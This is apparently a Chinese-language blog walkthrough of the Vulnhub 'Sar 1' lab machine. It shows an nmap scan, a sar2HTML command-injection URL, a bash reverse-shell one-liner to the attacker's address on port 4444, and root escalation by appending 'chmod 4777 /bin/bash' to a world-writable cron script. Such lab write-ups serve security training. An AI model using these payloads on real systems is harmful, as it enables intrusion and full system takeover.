Vulnhub:Sar 1靶机

发布时间 2023-04-21 15:42:03作者: ctostm

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

查看目标网站robots.txt,提示存在一个目录sar2HTML

image

访问sar2HTML目录发现是sar2HTML CMS

image

搜索后发现该CMS存在远程代码执行

searchsploit sar2HTML

image

image

漏洞利用

执行命令

http://192.168.111.130/sar2HTML/index.php?plot=;命令

image

反弹shell需要url编码

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

image

提权

查看目标计划任务,发现每5分钟以root身份执行/var/www/html/finally.sh

image

finally.sh会执行write.sh,而write.sh有777权限,修改write.sh提升为root

image

echo 'chmod 4777 /bin/bash' >> write.sh
/bin/bash -p

image